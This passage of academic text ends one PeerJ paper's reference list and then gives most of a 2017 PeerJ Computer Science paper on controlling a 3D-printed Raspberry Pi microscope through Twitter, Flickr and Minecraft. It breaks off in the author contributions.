Attaching uncertainty to deterministic spatial in- terpolations. Statistical Methodology 9(1–2):251–264 DOI 10.1016/j.stamet.2011.06.001. Hofstra N, Haylock M, New M, Jones P, Frei C. 2008. Comparison of six methods for the interpolation of daily, European climate data. Journal of Geophysical Research 113(D21):D21110 DOI 10.1029/2008JD010100. Hunter JD. 2007. Matplotlib: a 2D graphics environment. Computing in Science & Engineering 9(3):90–95 DOI 10.1109/MCSE.2007.55. Keller VDJ, Tanguy M, Prosdocimi I, Terry JA, Hitt O, Cole SJ, Fry M, Morris DG, Dixon H. 2015. CEH-GEAR: 1 km resolution daily and monthly areal rainfall estimates for the UK for hydrological and other applications. Earth System Science Data 7(1):143–155 DOI 10.5194/essd-7-143-2015. Lyra GB, Correia TP, De Oliveira-Jnior JF, Zeri M. 2018. Evaluation of methods of spatial interpolation for monthly rainfall data over the state of Rio de Janeiro, Brazil. Theoretical and Applied Climatology 134(3):955–965 DOI 10.1007/s00704-017-2322-3. Okabe A, Boots B, Sugihara K, Chiu SN. 2000. Spatial Tessellations: concepts and applications of Voronoi diagrams. 2nd edition. Chichester: John Wiley & Sons. O’Sullivan D, Unwin DJ. 2010. Geographic information analysis. 2nd edition. Hoboken: John Wiley & Sons. Park SW, Linsen L, Kreylos O, Owens JD, Hamann B. 2006. Discrete Sibson interpo- lation. IEEE Transactions on Visualization and Computer Graphics 12(2):243–253 DOI 10.1109/TVCG.2006.27. Pérez F, Granger BE, Hunter JD. 2011. Python: an ecosystem for scientific computing. Computing in Science & Engineering 13(2):13–21 DOI 10.1109/MCSE.2010.119. Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 14/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.282#supplemental-information http://dx.doi.org/10.7717/peerj-cs.282#supplemental-information http://dx.doi.org/10.1080/01431160310001599006 http://dx.doi.org/10.1016/j.cageo.2008.09.001 http://dx.doi.org/10.1111/2041-210X.12308 http://dx.doi.org/10.1145/358523.358553 http://dx.doi.org/10.1016/j.stamet.2011.06.001 http://dx.doi.org/10.1029/2008JD010100 http://dx.doi.org/10.1109/MCSE.2007.55 http://dx.doi.org/10.5194/essd-7-143-2015 http://dx.doi.org/10.1007/s00704-017-2322-3 http://dx.doi.org/10.1109/TVCG.2006.27 http://dx.doi.org/10.1109/MCSE.2010.119 http://dx.doi.org/10.7717/peerj-cs.282 Sambridge M, Braun J, McQueen H. 1995. Geophysical parametrization and interpo- lation of irregular data using natural neighbours. Geophysical Journal International 122(3):837–857 DOI 10.1111/j.1365-246X.1995.tb06841.x. Sibson R. 1981. A brief description of natural neighbour interpolation. In: Barnett V, ed. Interpreting multivariate data. Chichester: Wiley, 21–36. Slocum TA, McMaster RB, Kessler FC, Howard HH. 2014. Thematic cartography and geovisualization. Harlow: Pearson Education Limited. Tobler W. 1970. A computer movie simulating urban growth in the Detroit region. Economic Geography 46(2):234–240 DOI 10.2307/143141. Tomlin CD. 1990. Geographic information systems and cartographic modeling. Englewood Cliffs: Prentice-Hall. Van der Walt S, Colbert SC, Varoquaux G. 2011. The NumPy array: a structure for efficient numerical computation. Computing in Science & Engineering 13(2):22–30 DOI 10.1109/MCSE.2011.37. Virtanen P, Gommers R, Oliphant TE, Haberland M, Reddy T, Cournapeau D, Burovski E, Peterson P, Weckesser W, Bright J, van der Walt SJ, Brett M, Wilson J, Millman KJ, Mayorov N, Nelson ARJ, Jones E, Kern R, Larson E, Carey CJ, Polat I, Feng Y, Moore EW, VanderPlas J, Laxalde D, Perktold J, Cimrman R, Henriksen I, Quintero EA, Harris CR, Archibald AM, Ribeiro AH, Pedregosa F, van Mulbregt P, Vijaykumar A, Bardelli AP, Rothberg A, Hilboll A, Kloeckner A, Scopatz A, Lee A, Rokem A, Woods CN, Fulton C, Masson C, Häggström C, Fitzgerald C, Nicholson DA, Hagen DR, Pasechnik DV, Olivetti E, Martin E, Wieser E, Silva F, Lenders F, Wilhelm F, Young G, Price GA, Ingold G-L, Allen GE, Lee GR, Audren H, Probst I, Dietrich JP, Silterra J, Webber JT, Slavi J, Nothman J, Buchner J, Kulick J, Schnberger JL, de Miranda Cardoso JV, Reimer J, Harrington J, Rodrguez JLC, Nunez-Iglesias J, Kuczynski J, Tritz K, Thoma M, Newville M, Kmmerer M, Bolingbroke M, Tartre M, Pak M, Smith NJ, Nowaczyk N, Shebanov N, Pavlyk O, Brodtkorb PA, Lee P, McGibbon RT, Feldbauer R, Lewis S, Tygier S, Sievert S, Vigna S, Peterson S, More S, Pudlik T, Oshima T, Pingel TJ, Robitaille TP, Spura T, Jones TR, Cera T, Leslie T, Zito T, Krauss T, Upadhyay U, Halchenko YO, Vázquez-Baeza Y. 2020. SciPy 1.0: fundamental algorithms for scientific computing in Python. Nature Methods 17(3):261–272 DOI 10.1038/s41592-019-0686-2. Watson D. 1999. The natural neighbor series manuals and source codes. Computers & Geosciences 25(4):463–466 DOI 10.1016/S0098-3004(98)00150-2. Willmott CJ, Matsuura K. 2005. Advantages of the mean absolute error (MAE) over the root mean square error (RMSE) in assessing average model performance. Climate Research 30(1):79–82 DOI 10.3354/cr030079. Willmott CJ, Matsuura K. 2006. On the use of dimensioned measures of error to eval- uate the performance of spatial interpolators. International Journal of Geographical Information Science 20(1):89–102 DOI 10.1080/13658810500286976. Yilmaz HM. 2007. The effect of interpolation methods in surface definition: an experimental study. Earth Surface Processes and Landforms 32(9):1346–1361 DOI 10.1002/esp.1473. Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 15/16 https://peerj.com http://dx.doi.org/10.1111/j.1365-246X.1995.tb06841.x http://dx.doi.org/10.2307/143141 http://dx.doi.org/10.1109/MCSE.2011.37 http://dx.doi.org/10.1038/s41592-019-0686-2 http://dx.doi.org/10.1016/S0098-3004(98)00150-2 http://dx.doi.org/10.3354/cr030079 http://dx.doi.org/10.1080/13658810500286976 http://dx.doi.org/10.1002/esp.1473 http://dx.doi.org/10.7717/peerj-cs.282 Zhang J, Goodchild M. 2002. Uncertainty in Geographical Information. London: Taylor & Francis DOI 10.1201/b12624. Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 16/16 https://peerj.com http://dx.doi.org/10.1201/b12624 http://dx.doi.org/10.7717/peerj-cs.282 work_zsdcnoxlmvf4rm6xntj2tme3ye ---- Submitted 28 February 2017 Accepted 9 November 2017 Published 11 December 2017 Corresponding author Andrew E. Pelling, a@pellinglab.net, apelling@uottawa.ca Academic editor Feng Xia Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.139 Copyright 2017 Leblanc-Latour et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Utilizing social media and video games to control #DIY microscopes Maxime Leblanc-Latour1, Craig Bryan1 and Andrew E. Pelling1,2,3,4 1 Department of Physics, University of Ottawa, Ottawa, Ontario, Canada 2 Department of Biology, University of Ottawa, Ottawa, Ontario, Canada 3 Institute for Science, Society and Policy, University of Ottawa, Ottawa, Ontario, Canada 4 SymbioticA and the School of Anatomy, Physiology and Human Biology, University of Western Australia, Perth, Western Australia, Australia ABSTRACT Open-source lab equipment is becoming more widespread with the popularization of fabrication tools such as 3D printers, laser cutters, CNC machines, open source microcontrollers and open source software. Although many pieces of common laboratoryequipmenthavebeendeveloped,softwarecontroloftheseitemsissometimes lacking. Specifically, control software that can be easily implemented and enable user-input and control over multiple platforms (PC, smartphone, web, etc.). The aim of this proof-of principle study was to develop and implement software for the control of a low-cost, 3D printed microscope. Here, we present two approaches which enable microscope control by exploiting the functionality of the social media platform Twitter or player actions inside of the videogame Minecraft. The microscope was constructed from a modified web-camera and implemented on a Raspberry Pi computer. Three aspects of microscope control were tested, including single image capture, focus control and time-lapse imaging. The Twitter embodiment enabled users to send ‘tweets’ directly to the microscope. Image data acquired by the microscope was then returned to the user through a Twitter reply and stored permanently on the photo-sharing platform Flickr, along with any relevant metadata. Local control of the microscope was also implemented by utilizing the video game Minecraft, in situations where Internet connectivity is not present or stable. A virtual laboratory was constructed inside the Minecraft world and player actions inside the laboratory were linked to specific microscope functions. Here, we present the methodology and results of these experiments and discuss possible limitations and future extensions of this work. Subjects Network Science and Online Social Networks, Social Computing Keywords Microscope, Do-It-Yourself, Open source, Raspberry Pi, Twitter, Flickr INTRODUCTION The general interest in using and developing low cost, open source labware is gaining considerable traction in garages, academic labs and commercial spaces (Baden et al., 2015; Keulartz & Van den Belt, 2016). This is largely being driven by the so-called ‘‘maker movement’’ in which people are now exploiting the widespread popularity and accessibility of fabrication tools (3D printers, laser cutters, CNC machines, etc.) and open source electronics (Arduino, Raspberry Pi, etc) to build simple and advanced scientific equipment How to cite this article Leblanc-Latour et al. (2017), Utilizing social media and video games to control #DIY microscopes. PeerJ Com- put. Sci. 3:e139; DOI 10.7717/peerj-cs.139 https://peerj.com mailto:a@pellinglab.net mailto:apelling@uottawa.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.139 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.139 for a diversity of applications (Pearce, 2012). Designs and instructions are shared freely, typically under some form of open source license, and generally undergo several rounds of improvement as a result of the contributions from other users. Importantly, such innovations have matured to a level that it is possible to setup a basic, functional, laboratory space at extremely low cost. In addition, the spirit of ‘‘frugal science’’ has led to several innovations in low cots diagnostic tools, often built around cell phone platforms. These approaches have the important potential for lowering the cost of diagnosis and treatment of diseases in both developed and developing countries. In the context of the biological sciences, the ‘‘do-it-yourself biology (DIYBio) movement’’hasdriven thedevelopmentofseveral toolsthatarecritical inanycell/molecular biology laboratory (Landrain et al., 2013). This includes open source pipettes (Baden, 2014), centrifuges (Wong et al., 2008), water baths (Garvey, 2012), stirrers and hot plates (Watts, 2011), shakers (Miller, 2010), electrophoresis kits (Long, 2011), incubators (Pelling, 2015), PCR (Chai Biotechnologies Inc., 2014a; Wong et al., 2015) and qPCR (Chai Biotechnologies Inc., 2014b) machines, and low cost kits for manipulating DNA or transforming bacteria (Synbiota, 2017). One other key piece of equipment is a light microscope. Several designs and approaches have been developed for creating low cost light microscopes with reasonable magnification (Cybulski, Clements & Prakash, 2014). Such designs have resulted in microscopes that can operate in a variety of modalities including bright field, dark field and fluorescence (Cybulski, Clements & Prakash, 2014; McLeod & Ozcan, 2016). Cellphone based microscopes have been developed in which the phone’s camera is simply employed as the imaging sensor (Contreras-Naranjo, Wei & Ozcan, 2016). These approaches either mount a low cost set of optics directly to the cellphone camera (Zhu et al., 2011) or mount the cell phone onto a simplified microscope stand that employs microscope objectives (Skandarajah et al., 2014). Alternatively, discarded webcams can be converted into the microscope by taking apart the camera and simply flipping the lens in front of the imaging sensor (Switz, D’Ambrosio & Fletcher, 2014), or placing a low cost ball lens in front of an imaging sensor or the eye (Smith et al., 2011). Lenses can also be sourced from a discarded CD-ROM drive or an optical mouse (Cavanihac, 2006; Ibanez, 2012). The ability to generate functional, low cost microscopes is made more attractive as they can be simply produced from discarded electronics. Indeed, the simplest embodiment of a DIY Microscope can be achieved by simply placing a water drop on the cellphone front facing camera. These various approaches are not only important for educational purposes, but also have a significant role to play in developing low cost diagnostic tools for the lab or the field (Landrain et al., 2013; Baden, 2014; Wong et al., 2008; Garvey, 2012; Watts, 2011; Miller, 2010; Long, 2011; Pelling, 2015; Chai Biotechnologies Inc., 2014a; Wong et al., 2015; Chai Biotechnologies Inc., 2014b; Synbiota, 2017; Cybulski, Clements & Prakash, 2014; McLeod & Ozcan, 2016; Contreras-Naranjo, Wei & Ozcan, 2016; Zhu et al., 2011; Skandarajah et al., 2014; Switz, D’Ambrosio & Fletcher, 2014; Smith et al., 2011; Cavanihac, 2006; Ibanez, 2012; Kim, Gerber & Riedel-Kruse, 2016). As low-cost imaging tools (and general labware) become more prevalent there is an increasing need for the development of software control and monitoring solutions. In order to employ a DIY Microscope in a research setting, one may desire the ability to conduct Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.139 imaging experiments without having to be physically present at the microscope in order initiate image capture. For example, conducting time-lapse experiments of cell growth on a microscope has been placed inside of a sterile, temperature and atmospherically controlled incubator. Therefore, the purpose and objective of this study was to develop a general proof of-principle approach and physical embodiment of DIY Microscope control that relies on freely available programs that can be installed on a PC or cellphone. In order to achieve these goals, we first constructed a basic DIY Microscope by modifying the popular Rapsberry Pi (RPi) camera to act as an objective (Switz, D’Ambrosio & Fletcher, 2014). A 3D printed case for the RPi computer and camera was designed and contructuted to form a microscope stand. Finally, a DVD-ROM drive was used to create a moveable sample stage, allowing for focus control. Sample positioning along the optical axis of the microscope and image capture was controlled by a Python script. Once the DIY microscope was constructed, we developed user interfaces by exploiting three popular existing applications and their available application program interfaces (APIs). Here, we demonstrate the ability to use the popular Twitter interface to send commands to an Internet connected DIY microscope. We also implemented online data storage by uploading captured images, along with important metadata, to the photo- sharing network Flickr. In this scenario, the DIY Microscope was assigned a Twitter account (@DIYMicroscope), which monitored for simple commands sent by any other Twitter user. Simple message syntax was developed in order to allow other user to adjust microscope focus, capture single images or initiate time-lapse recordings. Upon image capture, all data was stored on a publically accessible Flickr account. In a second embodiment, we developed an approach to control a local DIY Microscope by exploiting the API of the popular video game Minecraft. Here, we first constructed a virtual lab inside of the Minecraft world. In this scenario, one is able to ‘‘play’’ within this virtual world and use gaming actions to control a physical DIY microscope. Simple actions inside of the videogame allowed one to again adjust microscope focus, capture single images or initiate time-lapse recordings. In this case, the images are stored locally on the RPi hard drive. In this embodiment, there is no need for a consistent or reliable Internet connection. To our knowledge, this is the only social media and video game controlled microscope. MATERIALS AND METHODS DIY Microscope A basic DIY Microscope was constructed by employing strategies that have been previously demonstrated (Cybulski, Clements & Prakash, 2014; Switz, D’Ambrosio & Fletcher, 2014; Cavanihac, 2006). Briefly, the microscope was constructed using a Raspberry Pi (RPi) model B+ as the control computer, an RPi camera module (Rasperry Pi Foundation, Cambridge, UK), a discarded computer DVD-ROM drive and a 3D printed frame (MakerBot Replicator 2; MakerBot, Brookyln, NY, USA) (Fig. 1A). All 3D printer files are available online at http://www.thingiverse.com/pellinglab. The original lens from the RPi camera module was removed prior to installation, leaving only the image sensor (OmniVision OV5647-5MPx; OmniVision, Santa Clara, CA, USA). A web camera lens (Logitech c310) was then inverted Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 3/16 https://peerj.com http://www.thingiverse.com/pellinglab http://dx.doi.org/10.7717/peerj-cs.139 Figure 1 DIY microscope construction. (A) A case was 3D printed in order to mount the RPi computer, camera and lens assembly and DVD-ROM drive chassis. A sample stage was also 3D printed and mounted to the laser pickup assembly. (B) A simple motor driver was then employed to control the stepper motor with the GPIO pins of the RPi. (C) Calibration of the microscope was achieved by acquiring images of mi- crofabricated atomic force microscopy cantilevers. The lower cantilever has a known length of 200 µm, corresponding to 190 pixels in the image (scale bar=200 µm). Full-size DOI: 10.7717/peerjcs.139/fig-1 Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 4/16 https://peerj.com https://doi.org/10.7717/peerjcs.139/fig-1 http://dx.doi.org/10.7717/peerj-cs.139 and installed on top of the image sensor. The RPi camera module and the lens were maintained in fixed positions relative to one another by mounting in a 3D printed mount. The DVD-Rom drive was then disassembled leaving only the stepper motor, the laser pickup assembly and the frame intact. The drive was then mounted perpendicular to the RPi camera assembly in order to create a sample positioning stage that could be moved along the optical axis of the microscope in an inverted configuration. In order to fix the positions of each component of the entire assembly, a 3D printed frame was produced to which all components could be mounted. Finally, a sample stage was 3D printed and mounted to the laser pickup assembly. This configuration allowed us to easily adjust sample position and focus under computer control. The movement of the sample tray was achieved by controlling the movement of the stepper motor by employing the Easy Driver Stepper Motor Driver V4.4 (http://www.schmalzhaus.com/EasyDriver) in 8-step micro stepping mode. The driver and a standard 5 mm white LED were connected to RPi via GPIO pins in order to control sample positioning and illumination (Fig. 1B). To calibrate the DIY microscope, we acquired images of standard microfabricated cantilevers commonly employed used in atomic force microscopy. The cantilevers have known dimensions. The larger cantilever in the image is 200 µm, corresponding to 190 pixels in a 1,600 by 900 pixel image (Fig. 1C). Online control of the DIY microscope A Python script was written that allows any Twitter subscriber to remotely interact with the microscope via the Twitter app or website. The code we developed is available online at https://github.com/pellinglab. The open source Python library Tweepy (http://www.tweepy.org) was employed to facilitate communication with Twitter’s application programming interface (API). The microscope was assigned the Twitter account @DIYMicroscope in order to facilitate user interaction. The Python script running on the RPi monitors ‘tweets’ sent to the account @DIYMicroscope and examines them for simple key words. For example, the Twitter user can capture single images, control sample positioning and focus, and initiate time-lapse imaging (details are presented in the ‘Results and Discussion’ section). Online image capture and storage The RPi storage capacity can be limited as it is defined by the capacity of the SD card the user has employed. In order to prevent memory issues associated with a large number of image acquisitions, we utilized the photo-sharing website Flickr (flickr.com), as an image hosting platform. To remotely and automatically interact with the Flickr API, we implemented the Beej Flickr API Python library (http://stuvel.eu/flickrapi). Each time an image is acquired by the script (i.e., a single frame or a concatenate of frames), a copy is uploaded to the DIY microscope’s Flickr account. Then the original image is removed then from the RPi hard drive to save space. Offline control of the DIY microscope To locally control the microscope, we designed a Python script that will create a user interface in the videogame universe of Minecraft (Mojang). The code we developed is Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 5/16 https://peerj.com http://www.schmalzhaus.com/EasyDriver https://github.com/pellinglab http://www.tweepy.org https://twitter.com/diymicroscope https://twitter.com/diymicroscope https://flickr.com http://stuvel.eu/flickrapi http://dx.doi.org/10.7717/peerj-cs.139 available online at https://github.com/pellinglab. We constructed a virtual lab in which user actions during game play can be used to initiate specific microscope functions. To achieve this, we employed the Minecraft Python API library (http://www.stuffaboutcode. com/p/minecraft-api-reference.html). Inside the virtual laboratory, the sword-equipped player can control the microscope by performing specific actions with ‘control blocks’ inside the virtual laboratory. Block actions were designed to allow the user to generate a live preview, capture an image and adjust the stage position for focus control. Captured images are stored in a specific local folder for future use. RESULTS AND DISCUSSION Software design for twitter control When the Python script is launched, an authentication procedure to Flickr is initiated (a Yahoo! account, API key and API secret are required), followed by an authentication to twitter (a Twitter account, API key and API secret, token and secret token are required). Both accounts must be established and verified by the system administrator in advance. The Flickr account is required for storage of images acquired by the DIY Microscope. The DIY Microscope will be addressed and controlled by sending ‘tweets’ that mention the system specified Twitter account. When the authentication between Flickr and Twitter is correctly established, the script connects to Twitter’s streaming API with specific keywords. This allows the program to obtain real-time tweets from the social network. When a user sends a tweet to the system-specified Twitter account containing single, or multiple, keywords, a JavaScript Object Notation (JSON) object is returned by the streaming API, containing parameters such as the user name, screen name, location, tweet content and the time. The JSON object is then examined and conditional actions are undertaken depending on the keywords identified in the tweet (Fig. 2). Importantly, to avoid any unwanted interactions with the DIY Microscope (i.e., a random user has one of the keywords in their tweets), the requesting user must include the system-specified twitter handle (e.g., @example) in their tweet. In this embodiment, we designed four types of user interaction, such as taking a single image, initiating a timelapse, adjusting the focus and obtaining a ‘focus group’ image (Figs. 3 and 4). When the tweet contains the keyword ‘singleimage’ (Fig. 3A), the current image frame captured by the RPi camera is temporarily stored on the RPi, a scale bar is drawn on the image and returned to the requesting user in a Twitter message (Fig. 3B). In addition to the returned image, the reply tweet also includes the message ‘@user scale bar is X_UNITS’’, where @user is the Twitter handle of the requesting user and X_UNITS=value determined by the user after microscope calibration. Finally, the temporarily stored local copy of the image is then uploaded to the user specified Flickr account and permanently removed from the RPi. In Fig. 3, a single image is requested by the user @pellinglab and an image of cellulose derived from apples (Modulevsky et al., 2014) is acquired and returned by the microscope. To move the stage in order to focus the sample, the user sends a tweet to the DIY Microscope that includes the keywords ‘diyfocus further N’ or ‘diyfocus closer N’ (N = Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 6/16 https://peerj.com https://github.com/pellinglab http://www.stuffaboutcode.com/p/minecraft-api-reference.html http://www.stuffaboutcode.com/p/minecraft-api-reference.html http://dx.doi.org/10.7717/peerj-cs.139 Figure 2 Flow-chart representing our Python script that enables Twitter-based user interaction with the DIY Microscope. Full-size DOI: 10.7717/peerjcs.139/fig-2 integer value). The sample stage will then move further away, or closer to, the RPi camera by N microsteps. An image will be acquired after moving to the new position, sent back to the user through twitter and stored on Flickr as above. If the user wants to sample multiple focus positions, a tweet is constructed which includes the keywords ‘diyfocus dofocus N’ (N = integer value). In this scenario, the sample platform is moved away from the RPi camera by N microsteps and an image is acquired. The sample then moves another N microsteps away from the camera a second image is obtained before moving back to the original position. The process is then repeated in the opposite direction in order to acquire image number 3 and 4. The four locally stored images are uploaded to Flickr, along with their metadata (the twitter handle of the requesting user, the original message sent by the user, N and the corresponding frame number), and then concatenated into a single 900 by 900 pixel image (Fig. 4A). The concatenated image is then returned to the user with the corresponding frame numbers printed on each sub-image along with the message ‘@user your N microstep dofocus sequence is complete’ (where @user and N are determined from the original user message). The user can now adjust the stage position to the desired Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 7/16 https://peerj.com https://doi.org/10.7717/peerjcs.139/fig-2 http://dx.doi.org/10.7717/peerj-cs.139 Figure 3 Twitter acquisition of a single image from the DIY Microscope. (A) The account @pellinglab initiates image acquisition by posting a tweet that mentions the account @DIYMicroscope and includes the keyword ‘singleImage’. Other text can be included in the message but the script will ignore them. (B) The DIY microscope acquires an image and responds to the resting account. Full-size DOI: 10.7717/peerjcs.139/fig-3 location (using the ‘diyfocus further/closer’ keywords, followed by an appropriate integer value). In Fig. 4A, the concatenated image of a hematoxylin and eosin stained histology sample being moved in and out of focus is shown. Finally, the user can initiate a time lapse using the ‘diytimelapse duration D frequency F’ keywords, replacing the ‘D’ and ‘F’ with integers for duration and frequency, respectively. The D and F, values assume units of minutes and frames/minute, respectively. The timelapse is carried out as requested and each acquired image is uploaded to Flickr along with its corresponding metadata (the twitter handle of the requesting user, the original message sent by the user, D, F and the corresponding frame number). Upon completion of the timelapse, a concatenated image containing the first and last frame of the time lapse is constructed and returned to the user with the frame numbers printed on each sub-image (Fig. 4B). The returned image also includes the message ‘@user your timelapse of D minutes at F frames/minute is now complete’ (where @user, D and F are determined Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 8/16 https://peerj.com https://twitter.com/pellinglab https://twitter.com/diymicroscope https://doi.org/10.7717/peerjcs.139/fig-3 http://dx.doi.org/10.7717/peerj-cs.139 Figure 4 Focus and time-lapse control through Twitter interactions. (A) The command ‘diyfocus dofo- cus N’ initiates image capture of the sample when moved to four specific positions. The user is then pro- vided with a concatenated image containing the four acquired, and indexed, images. This routine allows the user to determine the optimal sample position in order to set the focus. (continued on next page...) Full-size DOI: 10.7717/peerjcs.139/fig-4 Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 9/16 https://peerj.com https://doi.org/10.7717/peerjcs.139/fig-4 http://dx.doi.org/10.7717/peerj-cs.139 Figure 4 (...continued) In this case, a sample histology slide was employed for imaging. As these images are only for stage posi- tioning purposes no scale bar is included; however, each image is 0.95×0.95 mm. (B) It is also possible to initiate time-lapse imaging using the keywords ‘diytimelaspe duration D frequency F’, D and F, corre- spond to integer values with units of minutes and frames/minute, respectively. In this case, brine shrimp (Artemia—commonly grown as live feed for fish larva) were imaged with the microscope. A final image is returned to the user that only contains the first and last image acquired during the timelapse interval. All images from the sequence are stored on Flickr along with any relevant metadata. No scale bar is provided in this example; however, the scale is known after user calibration and relevant details are included in the Flickr metadata. In this case each image is 1.70×0.95 mm. from the original user message). In Fig. 4B, time-lapse microscopy was conducted on a sample of Artemia (brine shrimp) and the image sent back to the user through twitter is shown. Four images were acquired (duration of one minute at a frequency of four images per minute) and as described above, only the first and last images are sent to the user through twitter. All images in the sequence are stored on Flickr for later analysis by the user. Importantly, whenever an image is uploaded to Flickr (irrespective of the keyword(s) employed), specific metadata is included with the image in order to allow for identification and filtering. The metadata associated with each image includes the twitter handle of the requesting user, the keyword(s), a timestamp and the frame number. Software design for minecraft control In situations where a user may lack Internet access, we designed an approach for local, offline, control of the DIY Microscope. In this case, we designed a Python script that allows for user interaction through the videogame Minecraft (Fig. 5). Conveniently, Minecraft is already included in the freely available Raspbian distribution of Linux for the RPi. When our Python script is launched, the player position is immediately updated to be facing the virtual ‘laboratory’ (Fig. 6). Upon entering the laboratory, a sword-equipped player can now interact with the DIY microscope ‘control blocks’ (Fig. 6A). When standing in front of the desired control block, the right mouse button can be used to initiate a specific action. Such actions will return an event object, containing the coordinates of the specific block as a tuple. The coordinate tuple is then used to initiate conditional actions that are used to control the ‘real-life’ DIY Microscope. When the player activates one the extremity blocks (black and grey blocks), the stepper motor will perform N microsteps clockwise (or counterclockwise). The user can specify N in the Python script. The yellow block will display a live preview of the sample, on a 640 by 480 pixels window (Fig. 6B). The blue blocks will take a single image when activated, and save the image as a ‘‘.png’’ file on the RPi. To avoid over usage of the GPU memory, the program will close live preview (if open) prior to acquiring an image. A message on the minecraft user-interface is displayed when the image is successfully stored (Fig. 6C). Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 10/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.139 Figure 5 Flow-chart representing our Python script that enables Minecraft-based user interaction with the DIY Microscope. Full-size DOI: 10.7717/peerjcs.139/fig-5 CONCLUSIONS Possible limitations The Twitter public streaming API limits the application to a fixed number of keyword filters per application (Twitter, Inc, 2015). The current application only requires 3 keywords (‘‘singleImage’’,’’diyfocus’’ and ‘‘diytimelapse’’) to initiate user-interaction, however, more complex interactions may require many more keywords. As well, user-interaction is also limited by the number of allowed connections to the API per hour (Twitter, Inc, 2015) but the exact number is not currently publically available. Importantly, a user will also receive an error message from Twitter if they post the exact same tweet multiple times Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 11/16 https://peerj.com https://doi.org/10.7717/peerjcs.139/fig-5 http://dx.doi.org/10.7717/peerj-cs.139 Figure 6 The Minecraft environment. (A) The user simply uses the sword to control a locally connected DIY Microscope by interacting with the four control blocks inside of a virtual ‘laboratory’. The blocks al- low the user to adjust the sample stage up and down (black/gray 6 blocks), (B) obtain a live preview (yel- low block) and (C) acquire an image (cyan block). Full-size DOI: 10.7717/peerjcs.139/fig-6 Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 12/16 https://peerj.com https://doi.org/10.7717/peerjcs.139/fig-6 http://dx.doi.org/10.7717/peerj-cs.139 over a short time period. Therefore, Twitter will not allow a single user to post the tweet ‘@DIYMicrosocpe singleImage’ more than once. The user can overcome this limitation by adding more text to the tweet or deleting the original tweet. Currently, the Flickr API also limits the application to 3,600 requests per hour (Yahoo!, 2015). Some other limitations can also arise if multiple users are attempting to interact with the microscope simultaneously. For instance, if a time-lapse sequence is initiated, the script will complete the image acquisition before returning to the stream listener. In this case, a user sending a request will not get an immediate response from the microscope. Finally, the microscope is inherently limited to the presence and stability of Internet connectivity available to the RPi. In the case of a lost connection, the script will have to be re-executed in order to establish a connection to the Twitter streaming API and Flickr API. To overcome the issue with Internet connectivity, we also implemented a control interface within the Minecraft universe. Of course, electrical power is always required as with any modern microscope. However, it is possible to power the RPi using solar panels and batteries in cases where microscopic imagery is required but electrical connections are not easily accessed. As the Minecraft implementation of the DIY Microscope stores pictures locally, the maximum storage space will depend on the SD card capacity. Cloud storage can be implemented with the Minecraft program, but will require an Internet connection. However, if storage space becomes a limitation, the user can move the files to an alternative storage device (usb stick or via local file transfer) or employ a larger SD card. Possible extensions Future versions of both the Twitter and Minecraft interfaces could include image analysis features, such as cell counting, cell tracking for time lapses, image redundancy protections and thresholding by implementing OpenCV or other methods (Itseez, 2017). Such integration could allow the user to obtain qualitative and quantitative from the sample, in a remote or local way. An automatic focusing library could also be implemented to both program to enhance image quality acquisition rapidity. In its current implementation, our approach does not maintain privacy as all micro blogging posts and pictures on Twitter and Flickr are publicly available. In order to overcome this potential limitation, a smart phone based application could easily be developed to interact with the current version of the microscope, either via a direct connection (wifidirect or bluethooth) or a web-based server. Such a configuration could allow the user to use customize features, independent from Twitter, Flickr and Minecraft APIs, consequently avoiding the rate limitation from the third-parties. This will also be important for the implementation of a potential multi-user platform. Although the purpose of this study was to present a proof-of-concept implementation of using social media and video games to control our microscope, one can imagine extending this platform to allowing multi-user experiments. Future work will require rigorous testing to ensure the robustness of our embodiment for such applications. Of potential interest is that both of our approaches can also be exploited on other types of laboratory equipment. One can easily interface the multiple outputs of the RPi to an existing or ‘‘hand-made’’ equipment, or extends existing programs (Baden et al., 2015; Keulartz & Van den Belt, 2016; Pearce, 2012; Landrain et al., 2013). Future use of Leblanc-Latour et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.139 13/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.139 the Minecraft program can let access to multiple player in the ‘‘virtual laboratory’’, either by a local or internet connection. This let the possibility for the ‘‘players’’ to cooperatively interact and controls ‘‘real’’ physical laboratory equipment inside a virtual world. ACKNOWLEDGEMENTS The authors would like to thank Daniel Modulevsky and Dr. Charles Cuerrier for providing the histological sample for imaging. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the National Sciences and Engineering Research Council Discovery Grant. Andrew E. Pelling is supported by the Canada Research Chairs Program. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Sciences and Engineering Research Council Discovery Grant. Canada Research Chairs Program. Competing Interests The authors declare there are no competing interests. Author Contributions • Maxime Leblanc-Latour conceived and designed the experiments, performed the experiments, 